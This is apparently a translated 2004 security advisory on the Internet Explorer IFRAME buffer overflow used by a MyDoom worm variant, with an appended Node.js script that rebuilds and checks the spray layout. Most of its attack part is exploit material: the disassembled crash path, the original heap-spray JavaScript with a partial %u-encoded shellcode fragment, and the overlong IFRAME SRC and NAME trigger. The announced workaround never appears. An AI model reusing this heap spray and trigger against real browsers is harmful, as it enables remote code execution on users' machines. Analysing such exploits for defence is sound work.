Critical Network Attack Report - Analysis and Mitigation of the IE Iframe Vulnerability Exploit Code
On 2004/11/05 the US Computer Emergency Readiness Team (CERT) issued an alert on the IE Iframe and Frame vulnerability, warning US agencies at every level to guard against attackers exploiting this flaw; the threat level on the network has risen again.
The newly emerged MyDoom worm variant targets exactly this IE Iframe vulnerability, launching an all-out assault that gives IE users no peace.
The DragonSoft vulnerability audit team presents the following analysis of how the flaw works, together with an interim workaround for reducing the risk, so that users can lower their exposure and get through this critical period:
IE Iframe Buffer Overflow analysis:
- Iframe vulnerability analysis
IFRAME and FRAME are both HTML frame tags. The flaw is that when the SRC and NAME attributes of an IFRAME (or FRAME) are set, the attribute values are copied into a buffer without proper length validation,
which leads to a buffer overflow.
The overflow leaves EAX set to 0x0D0D0D0D, after which this code is executed (it treats EAX as an object pointer, loads what it takes to be the object's vtable from [EAX], and calls the first vtable entry):
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
Because the heap has been sprayed with 0x0D bytes around that address, [0x0D0D0D0D] == 0x0D0D0D0D, so ECX = 0x0D0D0D0D.
7178EC04 68 847B7071 PUSH 71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so the call jumps to 0x0D0D0D0D, which lands inside the sprayed sled. The same value thus serves three times: as the corrupted object pointer, as the fake vtable pointer, and as the call target. Since the byte 0x0D is the x86 opcode for OR EAX, imm32, a run of 0x0D bytes also executes harmlessly as a sled that slides into the shellcode.
- Iframe exploit analysis
(1) Shellcode delivered via script (heap spray)
<SCRIPT language="javascript">
// Shellcode, %u-encoded so that each %uXXXX becomes one UTF-16 code unit (two bytes, low byte first).
// The page shows only the first words of the payload.
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u89eb");
// Nopslide will contain these bytes:
bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header
headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exactly
// between the header and the shellcode in the heap blocks we want.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write good
// documentation for this.
// (All lengths here are JScript string lengths, i.e. UTF-16 code units; the loops
// stop when block + shellcode + headersize is exactly 0x40000 units.)
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
// And now we can create the heap blocks, we'll create 700 of them to spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>
(2) Overlong strings in the IFRAME SRC=file: and NAME attributes
<IFRAME SRC=file://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........
NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC............">
</IFRAME>
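The following is an added example, not code from the advisory or from the exploit's author. It rebuilds the spray-block arithmetic of the script in step (1) in Node.js and checks the two properties the disassembly walkthrough above depends on: that each sprayed string is sled bytes followed by the shellcode with sled + shellcode + headersize equal to exactly 0x40000 units, and that execution entering the 0x0D sled at any byte offset reaches the shellcode on an instruction boundary. It assumes the page's constants (0x40000, headersize 20), that JScript strings are stored as UTF-16LE, and the standard x86 encodings 0D = OR EAX, imm32 (5 bytes), 43 = INC EBX and EB = JMP short. Nothing here touches a browser heap; it only builds the same strings and inspects the byte image they would have in memory.

```javascript
// Added example (not from the original advisory or from the exploit author):
// the heap-spray layout of the script above, rebuilt so its invariants can be checked.

// JScript strings are UTF-16, so one "%uXXXX" is one 16-bit code unit (2 bytes).
// Lengths below are in code units unless the name says bytes.
const BLOCK_UNITS = 0x40000;  // sled + shellcode + header allowance, as in the exploit
const HEADER_UNITS = 20;      // the exploit's "headersize"
const SLED_UNIT = "\u0d0d";   // one sled unit; in memory: 0D 0D

// The shellcode words exactly as the page shows them (the page truncates the payload;
// only its first bytes matter for the layout and entry checks below).
const SHELLCODE_FRAGMENT = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u89eb");

// Same construction as the exploit: bigblock is doubled to the smallest power of two
// that covers slack = header + shellcode, block starts as bigblock minus slack, and
// every "block + block + fill" step doubles (block + slack). It therefore stops with
// block + slack == blockUnits exactly, as long as blockUnits is a power of two.
function buildSprayBlock(shellcode, headerUnits = HEADER_UNITS, blockUnits = BLOCK_UNITS) {
  const slack = headerUnits + shellcode.length;
  let big = SLED_UNIT + SLED_UNIT;
  while (big.length < slack) big += big;
  const fill = big.substring(0, slack);
  let block = big.substring(0, big.length - slack);
  while (block.length + slack < blockUnits) block = block + block + fill;
  return block + shellcode;
}

// Facts a practitioner wants to confirm before trusting the spray.
function checkLayout(sprayed, shellcode, headerUnits = HEADER_UNITS, blockUnits = BLOCK_UNITS) {
  const sledUnits = sprayed.length - shellcode.length;
  let sledClean = true;
  for (let i = 0; i < sledUnits; i++) {
    if (sprayed.charCodeAt(i) !== 0x0d0d) { sledClean = false; break; }
  }
  return {
    exact: sprayed.length + headerUnits === blockUnits,  // sled + shellcode + header == 0x40000
    sledBytes: sledUnits * 2,
    payloadBytes: sprayed.length * 2,
    sledClean,
    shellcodeAtTail: sprayed.endsWith(shellcode),
  };
}

// Byte image of a JScript string as IE keeps it in memory: UTF-16LE, low byte first.
function toBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const cu = str.charCodeAt(i);
    out[2 * i] = cu & 0xff;
    out[2 * i + 1] = cu >> 8;
  }
  return out;
}

// Why 0x0D works as sled filler: on x86 the byte 0D is "or eax, imm32", a 5-byte
// instruction, so a run of 0D bytes decodes as a chain of harmless ORs from any start.
// Walks that chain from `start` and reports where the CPU is when it first meets a
// non-0D opcode byte.
function walkSled(bytes, start) {
  let pc = start, count = 0;
  while (pc + 5 <= bytes.length && bytes[pc] === 0x0d) { pc += 5; count++; }
  return { count, pc };
}

// The last OR may swallow 1-4 shellcode bytes as its immediate, so execution can enter
// the shellcode at byte offset 0..4. The fragment on the page starts with
// 43 43 43 43 EB xx: four single-byte "inc ebx" followed by a short jmp, so every entry
// offset in 0..4 lands on an instruction boundary. Returns that entry offset.
function entryOffset(sprayed, shellcode, start) {
  const bytes = toBytes(sprayed);
  const sledBytes = (sprayed.length - shellcode.length) * 2;
  return walkSled(bytes, start).pc - sledBytes;
}

// First n bytes of the shellcode as they would sit in memory.
function shellcodeHead(shellcode, n) {
  return Array.from(toBytes(shellcode).subarray(0, n));
}
```

With the page's fragment the sled is 524228 bytes and the payload 524248 bytes, so the shellcode occupies only the last 20 bytes of each 512 KiB spray block; a pointer that lands anywhere else in the sprayed region hits 0x0D bytes, which is why 0x0D0D0D0D can be dereferenced twice and then executed.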